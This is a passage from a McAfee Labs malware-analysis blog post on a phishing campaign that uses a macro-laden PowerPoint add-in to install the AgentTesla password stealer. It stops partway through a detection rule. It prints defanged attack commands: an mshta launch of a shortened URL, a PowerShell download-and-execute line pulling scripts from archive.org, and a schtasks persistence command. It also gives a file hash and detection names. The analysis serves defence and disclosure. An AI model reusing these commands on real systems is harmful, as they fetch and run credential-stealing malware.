{"id":129442,"date":"2021-09-21T18:47:42","date_gmt":"2021-09-22T01:47:42","guid":{"rendered":"https:\/\/www.mcafee.com\/blogs\/?p=129442"},"modified":"2025-06-02T19:31:21","modified_gmt":"2025-06-03T02:31:21","slug":"malicious-powerpoint-documents-on-the-rise","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/malicious-powerpoint-documents-on-the-rise\/","title":{"rendered":"Malicious PowerPoint Documents on the Rise"},"content":{"rendered":"<p>Authored by <span class=\"TextRun BCX0 SCXW221523635\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun BCX0 SCXW221523635\">Anuradha M<\/span><\/span><\/p>\n<p><span data-contrast=\"auto\">McAfee Labs have observed a new phishing campaign that utilizes macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla which is a well-known password stealer.\u202fThese spam emails purport to be related to financial transactions. <\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">AgentTesla is a RAT (Remote Access Trojan) malware that<\/span><span data-contrast=\"none\">\u00a0<\/span><span data-contrast=\"auto\">has<\/span><span data-contrast=\"none\">\u00a0<\/span><span data-contrast=\"auto\">been active since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to\u202fsteal user credentials and other information from victims through screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">During Q2, 2021, we have seen an increase in PowerPoint malware.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}\">\u00a0<\/span><\/p>\n<p><span class=\"TextRun SCXW246394398 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW246394398 BCX0\">In this\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">campaign<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">,<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0the\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">spam email\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">contains\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">an<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">attach<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">ed<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">file with<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0a<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><\/span><span class=\"TextRun SCXW246394398 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW246394398 BCX0\">.<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW246394398 BCX0\">ppam<\/span><\/span><span class=\"TextRun SCXW246394398 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">extension\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">which is a PowerPoint<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">file\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">containing<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">VBA<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW246394398 BCX0\">code<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW246394398 BCX0\">. <\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW246394398 BCX0\">The<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0sentiment\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">used<\/span><\/span><span class=\"TextRun SCXW246394398 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><\/span><span class=\"TextRun SCXW246394398 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW246394398 BCX0\">was<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\"> finance-related<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">themes <\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">such as<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">:\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u201c<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">New PO300093 Order<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u201d<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0as shown in Figure<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">2<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">. The attachment\u202ffilename is\u00a0<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u201c<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">300093.<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">p<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">df.ppam<\/span><span class=\"NormalTextRun SCXW246394398 BCX0\">\u201d.<\/span><\/span><span class=\"EOP SCXW246394398 BCX0\" data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><i><span data-contrast=\"none\">PPAM file:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">This file type was introduced in 2007 with the release of Microsoft Office 2007. It\u202fis a\u202fPowerPoint macro-enabled Open XML add-in file. It contains components that add additional functionality, including extra commands, custom macros, and new tools for extending default PowerPoint functions.\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Since\u202fPowerPoint supports \u2018add-ins\u2019 developed by third parties to add new features,\u00a0attackers abuse this feature to\u00a0<\/span><b><span data-contrast=\"auto\">automatically execute macros<\/span><\/b><span data-contrast=\"auto\">.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><i><span data-contrast=\"none\">Technical\u00a0Analysis:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">Once\u00a0the victim opens the\u202f<\/span><b><i><span data-contrast=\"auto\">&#8220;.ppam&#8221;<\/span><\/i><\/b><span data-contrast=\"auto\"> file, a security notice warning pop-up as shown in Figure 3 to alert the user about the presence of macro.<\/span><\/p>\n<p><span class=\"TextRun SCXW41194158 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW41194158 BCX0\">From <\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">Figure<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">4<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">,<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">you can see\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">that t<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">h<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">e Add-in feature<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">\u00a0of the\u00a0<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW41194158 BCX0\">PowerPoint<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">can be identified from the\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">content\u202fof\u202f[Content_Types].xml file which will\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">be\u00a0<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">present inside the\u00a0<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW41194158 BCX0\">ppam<\/span><span class=\"NormalTextRun SCXW41194158 BCX0\">\u00a0file.<\/span><\/span><span class=\"EOP SCXW41194158 BCX0\" data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"auto\">\u00a0The\u00a0PPAM file\u00a0contains the following\u00a0files and directories\u00a0which can be seen\u00a0upon\u00a0extraction.<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">_rels\\.rels<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">[Content_Types].xml<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">ppt\\rels\\presentation.xml.rels<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" aria-setsize=\"-1\" data-aria-posinset=\"1\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">ppt\\asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin\u202f\u2013 Malicious file<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<li data-leveltext=\"\uf0b7\" data-font=\"Symbol\" data-listid=\"1\" aria-setsize=\"-1\" data-aria-posinset=\"2\" data-aria-level=\"1\"><i><span data-contrast=\"auto\">ppt\\presentation.xml<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><span data-contrast=\"auto\">Once the victim enables the macro, the add-in gets installed silently without user knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file but, in the backend, macro code gets executed to initiate the malicious activity.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span class=\"TextRun SCXW30320284 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW30320284 BCX0\">As you can see in Figure<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">6<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">, the macro is executed within <\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">the\u00a0<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">add-in\u00a0<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW30320284 BCX0\">auto_<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW30320284 BCX0\">open<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">(<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">) event<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">\u00a0<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW30320284 BCX0\">i.e.<\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW30320284 BCX0\">., <\/span><span class=\"NormalTextRun SpellingErrorV2 SCXW30320284 BCX0\">macro<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\">\u00a0is fired immediately\u00a0<\/span><\/span><span class=\"TextRun SCXW30320284 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW30320284 BCX0\">after the presentation is opened<\/span><span class=\"NormalTextRun SCXW30320284 BCX0\"> and the add-in is loaded.<\/span><\/span><span class=\"TextRun SCXW30320284 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW30320284 BCX0\">\u00a0<\/span><\/span><\/p>\n<p><span data-contrast=\"none\">The PowerPoint macro code on execution launches an URL by invoking mshta.exe (<\/span><span data-contrast=\"none\">Microsoft HTML Application) which is\u00a0shown in\u00a0Figure 7.<\/span><span data-contrast=\"auto\">\u00a0The\u00a0mshta\u00a0process is launched by\u00a0Powerpoint\u00a0by calling the\u202f<\/span><b><span data-contrast=\"auto\">CreateProcessA()<\/span><\/b><span data-contrast=\"none\">\u00a0<\/span><span data-contrast=\"auto\">API.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Below are the parameters passed to\u202fCreateProcessA() API:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><i><span data-contrast=\"auto\">kernel32.CreateProcessA(00000000,mshta\u00a0<\/span><\/i><a href=\"https:\/\/www.bitly.com\/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D\"><i><span data-contrast=\"none\">hxxps:\/\/www.bitly.com\/asdhodwkodwkidwowdiahsidh<\/span><\/i><i><span data-contrast=\"auto\">,00000000,00000000,00000001,00000020,00000000,00000000,D<\/span><\/i><\/a><i><span data-contrast=\"auto\">,<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Below\u202fis\u00a0the\u00a0command\u00a0line parameter\u00a0of\u00a0mshta:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">mshta<\/span><i><span data-contrast=\"none\">\u00a0<\/span><\/i><i><span data-contrast=\"none\">hxxps:\/\/www.bitly.com\/asdhodwkodwkidwowdiahsidh<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The URL\u00a0<\/span><i><span data-contrast=\"none\">hxxps:\/\/www.bitly.com\/asdhodwkodwkidwowdiahsidh<\/span><\/i><i><span data-contrast=\"none\">\u00a0<\/span><\/i><span data-contrast=\"none\">is redirected to\u00a0<\/span><i><span data-contrast=\"none\">\u201chxxps:\/\/p8hj[.]blogspot[.]com\/p\/27.html\u201d<\/span><\/i><i><span data-contrast=\"none\">\u00a0<\/span><\/i><span data-contrast=\"auto\">but it didn\u2019t get any response from \u201c27.html\u201d at the time of analysis.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">Later mshta.exe\u00a0spawns\u00a0powershell.exe as a child process.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Below\u00a0is\u00a0the command\u00a0line parameters\u00a0of\u00a0PowerShell:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">powershell.exe\u202f-\u202f&#8221;<\/span><i><span data-contrast=\"none\">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221;\u00a0i&#8217;E&#8217;x(iwr(&#8216;<\/span><\/i><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-1.txt<\/span><\/i><i><span data-contrast=\"none\">&#8216;) -useB);i&#8217;E&#8217;x(iwr(&#8216;<\/span><\/i><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-2.txt<\/span><\/i><i><span data-contrast=\"none\">&#8216;) -useB);i&#8217;E&#8217;x(iwr(&#8216;<\/span><\/i><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-3.txt<\/span><\/i><i><span data-contrast=\"none\">&#8216;) -useB);<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">PowerShell downloads and executed script files from the above-mentioned<\/span><span data-contrast=\"none\">\u00a0<\/span><span data-contrast=\"none\">URLs.\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The below\u00a0Figure\u00a08\u00a0shows the content of\u202fthe\u00a0first\u00a0url\u00a0&#8211;\u00a0&#8220;<\/span><i><span data-contrast=\"none\">hxxps:\/\/ia801403.us.archive.org\/23\/items\/150-Re-Crypted-25-June\/27-1.txt&#8221;:<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">There are two binary files stored in two huge arrays inside each downloaded PowerShell file.\u202fThe first file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla.\u00a0<\/span><span data-contrast=\"auto\">PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches <\/span><b><span data-contrast=\"auto\">MSBuild.exe<\/span><\/b><span data-contrast=\"auto\">\u00a0to\u00a0inject\u00a0the payload within itself.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><i><span data-contrast=\"none\">Schedule Tasks:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">To achieve persistence,\u00a0it\u00a0creates a\u00a0<\/span><span data-contrast=\"auto\">scheduled task in\u00a0<\/span><b><span data-contrast=\"auto\">\u201cTask Scheduler\u201d<\/span><\/b><span data-contrast=\"auto\">\u00a0and drops a task file under\u00a0<\/span><b><span data-contrast=\"auto\">C:\\windows\\system32\\SECOTAKSA<\/span><\/b><span data-contrast=\"auto\">\u00a0to make the entire campaign work effectively.\u00a0\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The new task name is\u00a0<\/span><b><span data-contrast=\"none\">\u201c<\/span><\/b><b><span data-contrast=\"auto\">SECOTAKSA<\/span><\/b><b><span data-contrast=\"none\">\u201d.<\/span><\/b><span data-contrast=\"none\"> Its action is to execute the command\u00a0<\/span><b><i><span data-contrast=\"none\">\u201c<\/span><\/i><\/b><b><i><span data-contrast=\"auto\">mshta<\/span><\/i><\/b><i><span data-contrast=\"auto\">\u00a0<\/span><\/i><i><span data-contrast=\"none\">hxxp:\/\/<\/span><\/i><i><span data-contrast=\"none\">\u00a0<\/span><\/i><i><span data-contrast=\"none\">\/\/1230948%1230948@0v2x.blogspot.com\/p\/27.html\u201d<\/span><\/i><span data-contrast=\"none\">\u00a0<\/span><span data-contrast=\"none\">and it\u2019s called every 80 minutes.<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Below\u00a0is\u00a0the command\u00a0line parameters\u00a0of\u00a0schtasks:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"auto\">schtasks.exe\u202f-\u202f<\/span><\/i><\/b><i><span data-contrast=\"auto\">&#8220;C:\\Windows\\System32\\schtasks.exe&#8221; \/create \/sc\u00a0MINUTE \/mo\u00a080 \/tn\u00a0&#8220;&#8221;SECOTAKSA&#8221;&#8221; \/F \/tr &#8220;&#8221;\\&#8221;&#8221;MsHtA&#8221;&#8221;\\&#8221;&#8221;<\/span><\/i><i><span data-contrast=\"none\">hxxp:\/\/1230948%1230948@0v2x.blogspot.com\/p\/27.html\\<\/span><\/i><i><span data-contrast=\"auto\">&#8220;&#8221;<\/span><\/i><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><i><span data-contrast=\"none\">Infection Chain:<\/span><\/i><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span class=\"TextRun BCX0 SCXW26649657\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun BCX0 SCXW26649657\">Process<\/span><\/span><span class=\"TrackChangeTextDeletion TrackedChange BCX0 SCXW26649657\"><span class=\"TextRun BCX0 SCXW26649657\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun BCX0 SCXW26649657\">\u00a0<\/span><\/span><\/span><span class=\"TextRun BCX0 SCXW26649657\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun BCX0 SCXW26649657\">Tree:<\/span><span class=\"NormalTextRun BCX0 SCXW26649657\">\u00a0<\/span><\/span><\/p>\n<h2><b><span data-contrast=\"none\">Mitigation:<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><span data-contrast=\"auto\">McAfee\u2019s Endpoint Security\u00a0(ENS)\u00a0and Windows\u00a0Systems Security\u00a0(WSS)\u00a0product\u00a0have\u00a0<\/span><b><span data-contrast=\"auto\">\u00a0DAT<\/span><\/b><span data-contrast=\"auto\">\u00a0coverage\u00a0for this variant of malware.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">This malicious PPAM document with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as \u201c<\/span><b><span data-contrast=\"auto\">W97M\/Downloader<\/span><\/b><span data-contrast=\"auto\">.<\/span><b><span data-contrast=\"auto\">dkw<\/span><\/b><span data-contrast=\"auto\">\u201d.\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"none\">The PPAM\u00a0document\u00a0is also\u00a0blocked by the\u00a0<\/span><b><span data-contrast=\"none\">AMSI feature<\/span><\/b><span data-contrast=\"none\">\u00a0in ENS as\u00a0<\/span><b><span data-contrast=\"none\">AMSI-FKN!<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Additionally, the <\/span><b><span data-contrast=\"auto\">Exploit Prevention<\/span><\/b><span data-contrast=\"auto\">\u00a0feature in McAfee\u2019s Endpoint Security product blocks the infection chain of this malware by adding the below expert rule\u00a0so as to\u00a0protect our customers from this malicious attack.<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:257}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"none\">Expert Rule authored based on\u00a0the\u00a0below infection chain:<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">POWERPNT.EXE &#8211;&gt; mshta.exe\u00a0<\/span><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<h2><b><span data-contrast=\"none\">Expert Rule:<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h2>\n<p><b><span data-contrast=\"auto\">Rule {<\/span><\/b><span data-ccp-props=\"{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u00a0 Process {<\/span><\/b><span 